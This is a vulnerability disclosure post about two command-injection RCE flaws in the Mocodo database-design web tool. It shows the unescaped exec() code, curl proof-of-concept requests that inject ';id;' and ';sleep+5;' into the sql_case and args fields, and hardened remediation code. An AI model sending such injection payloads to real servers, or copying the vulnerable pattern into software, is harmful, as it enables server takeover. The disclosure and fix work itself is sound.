Exploring Mocodo Vulnerabilities: A Compilation of CVEs from 2024

Introduction

In the world of software development, security is a major concern that must constantly be addressed to protect both data and infrastructure. This article describes in detail two critical Remote Command Execution (RCE) vulnerabilities discovered in Mocodo, a popular tool used for database design. These flaws, if exploited, could allow an attacker to take control of the server hosting the application. We will discuss the nature of these vulnerabilities, their potential implications, and the measures to take to secure Mocodo installations.

What is Mocodo?

Figure 0x1 – Mocodo

Mocodo is an online tool designed to help developers and database designers visualize and generate relational database schemas from a simple text description. Thanks to its ease of use and its ability to generate clear and understandable schemas, Mocodo has become a popular choice for teaching and professional projects. However, like any software, Mocodo is not immune to security flaws, some of which can have severe consequences.

Fun Fact: I discovered Mocodo at Oteria Cyber School, a cybersecurity school where I am pursuing my studies. We used this tool to learn how to create Conceptual Data Models (MCD) in database courses during the 2022-2023 academic year. This practical experience not only enriched our theoretical understanding but also highlighted the importance of security in handling and managing database schemas.

Vulnerability Discovery

The vulnerabilities in question were identified in PHP scripts that handle certain user inputs submitted via web forms. These scripts do not filter or escape those inputs before building a shell command line, allowing the injection and execution of arbitrary commands on the server where Mocodo is installed.

Technical Details of RCE Vulnerability in /web/generate.php (CVE-2024-35374)

Vulnerable Code Segment in /web/generate.php

if ($_POST['conversions']) {
    $transformation_options = "";
    $conversions = array();
    foreach ($_POST['conversions'] as $ext) {
        if ($ext == "_ddl.sql") {
            $transformation_options .= " " . $_POST['sql_case'] . ":labels";
        };
        if ($_POST['with_constraints']) {
            $option = $transformations[str_replace("_mld", "_mld_with_constraints", $ext)];
        } else {
            $option = $transformations[$ext];
        };
        $transformation_options .= " " . $option;
        $conversions[] = $ext;
    };
    $mocodo .= " -t{$transformation_options}";
    $basthon_options .= " --select all -t{$transformation_options}";
};

...

$command_line = "{$mocodo} 2>&1 >/dev/null";
exec($command_line, $out);

Explanation

  • Conversion processing: The code iterates over the $_POST['conversions'] array to process the different output formats requested by the user.
  • Command injection: If the _ddl.sql extension is found, the value of $_POST['sql_case'] is concatenated, unfiltered, into the transformation options, which are later passed to exec(). A maliciously crafted sql_case value can therefore carry arbitrary shell commands.

Exploitation Example

Use this curl command to simulate an attack exploiting this vulnerability:

curl -X POST https://mocodo.net/web/generate.php \
     -d "state=dirty&text=RCE:+rce&conversions[]=_ddl.sql&sql_case=;id;"

Figure 0x2 – PoC

Technical Details of RCE Vulnerability in /web/rewrite.php (CVE-2024-35373)

Vulnerable Code Segment in /web/rewrite.php

if (strpos($_SERVER['HTTP_REFERER'], 'localhost')) {
    $mocodo = "~/opt/anaconda3/bin/mocodo";
} else {
    $mocodo = "~/.local/bin/mocodo";
};
$command_line = "{$mocodo} -t " . $_POST['args'] . " 2>&1";

// Execute the command and test the exit code.
// If it is not 0, return an array with a key "err" and the error message.

$out = array();
exec($command_line, $out, $exitCode);
if ($exitCode) {
    echo json_encode(array("err" => implode("\n", $out)));
    exit();
}

Explanation

  1. Executable path selection: The path to the mocodo executable is chosen from the request's Referer header: one path is used when the header contains "localhost", another otherwise.
  2. Command construction: The path is then used to build a command line by appending $_POST['args'], a user-controlled value that is neither filtered nor escaped, allowing command injection.
  3. Command execution: The command is executed with exec(), and the output is processed. If an error occurs (indicated by a non-zero exit code), an error message is returned as JSON.

Exploitation Example

The vulnerability can be exploited by sending a POST request with a malicious payload in args. Here is how an attacker could use curl to inject a simple command (sleep 5), which would delay the server's response by 5 seconds:

curl -X POST https://mocodo.net/web/rewrite.php \
     -d "state=dirty&text=RCE:+rce&args=;sleep+5;"

Figure 0x3 – PoC

Solutions and Recommendations

Suggested Remediation Measures

To fix these vulnerabilities, it is crucial to implement strict validation of user inputs and/or escape every value that ends up in an executed command:

  • Use escapeshellarg() on each parameter passed to the system command so that no potentially dangerous character is interpreted as part of the command.
  • Validate inputs to ensure that the transmitted data matches expected, known-safe values before it is used in a system command context.

These measures will help prevent unauthorized command execution on the server and strengthen the overall security of the application.

Specific Remediation Steps

  • Command escaping: Use escapeshellarg() on $_POST['sql_case'] and $_POST['args'] to ensure all inputs are secured.
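As an added example of the two measures above, here are hardened equivalents of the command builders in generate.php and rewrite.php. This is illustration code written for this article, not Mocodo's own code and not the fix that shipped in version 4.2.7; the allow-lists of sql_case values and transformation names are assumptions chosen for the demonstration, not the tool's real option set.

```php
<?php
// Added example: hardened command builders for the two scripts discussed above.
// Not Mocodo's code. The two allow-lists are placeholders for illustration.

// Assumed acceptable values for the sql_case option (placeholder list).
const ALLOWED_SQL_CASE = ['lower', 'upper', 'camel', 'snake'];

// Assumed acceptable transformation names for the -t option (placeholder list).
const ALLOWED_TRANSFORMATIONS = ['arrange', 'obfuscate', 'ascii', 'fix'];

/**
 * generate.php: validate sql_case against the allow-list and return the
 * shell-safe fragment. Anything outside the list is rejected before it can
 * reach exec(), so a value such as ";id;" never becomes part of a command.
 */
function safe_sql_case_option(string $sql_case): string {
    if (!in_array($sql_case, ALLOWED_SQL_CASE, true)) {
        throw new InvalidArgumentException("unexpected sql_case value");
    }
    // The allow-list already guarantees a safe value; escapeshellarg() is
    // defence in depth in case the list is widened later.
    return " " . escapeshellarg($sql_case . ":labels");
}

/**
 * rewrite.php: each whitespace-separated token of $args is checked against
 * the allow-list and escaped individually, so several transformations can
 * still be passed while no token can break out of its own argv slot.
 */
function build_rewrite_command(string $mocodo, string $args): string {
    $tokens = preg_split('/\s+/', trim($args), -1, PREG_SPLIT_NO_EMPTY);
    $safe = [];
    foreach ($tokens as $token) {
        if (!in_array($token, ALLOWED_TRANSFORMATIONS, true)) {
            throw new InvalidArgumentException("unexpected transformation: $token");
        }
        $safe[] = escapeshellarg($token);
    }
    if ($safe === []) {
        throw new InvalidArgumentException("no transformation given");
    }
    // The executable path is quoted too; use an absolute path, since quoting
    // disables "~" expansion by the shell.
    return escapeshellarg($mocodo) . " -t " . implode(" ", $safe) . " 2>&1";
}

// Demonstration on constructed inputs. Nothing is executed: the functions
// only build (or refuse to build) command strings.
$sqlCaseInputs = [
    'legitimate' => 'lower',
    'injection'  => ';id;',
];
foreach ($sqlCaseInputs as $label => $value) {
    try {
        echo "$label: ", safe_sql_case_option($value), "\n";
    } catch (InvalidArgumentException $e) {
        echo "$label: rejected (", $e->getMessage(), ")\n";
    }
}

$argsInputs = [
    'legitimate' => 'arrange fix',
    'injection'  => ';sleep 5;',
];
foreach ($argsInputs as $label => $value) {
    try {
        echo "$label: ", build_rewrite_command('/usr/local/bin/mocodo', $value), "\n";
    } catch (InvalidArgumentException $e) {
        echo "$label: rejected (", $e->getMessage(), ")\n";
    }
}
```

Two design points matter here. First, escapeshellarg() wraps its whole argument in single quotes, so applying it to the entire $_POST['args'] string would turn several intended options into a single argv element; splitting on whitespace and escaping each token keeps the feature working. Second, the allow-list does the real work: it rejects the injection payloads outright, and escaping is only a second layer in case a value slips through that is syntactically valid but unexpected.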

Timeline of Events

  • May 9, 2024: Detection of Remote Command Execution (RCE) vulnerabilities in Mocodo.
  • May 9, 2024: Notification of vulnerabilities to the Mocodo team via their official communication channel.
  • May 9, 2024: Response from the Mocodo team, acknowledging receipt of the vulnerability report a few hours after notification.
  • May 9, 2024: Vulnerability fixed in version 4.2.7.
  • May 9, 2024: Article publication.

Useful Resources

For those interested in learning more about Mocodo or contributing to improving its security, here are useful links:

  • Mocodo Online - The online platform where Mocodo is accessible for creating database schemas.
  • GitHub - Mocodo - The GitHub repository of Mocodo, developed by Aristide Grange, where the source code is available and community contributions are welcome.

Acknowledgments

I sincerely thank the Mocodo team, and particularly the developer Aristide Grange, for their quick response and recognition of the importance of these security issues.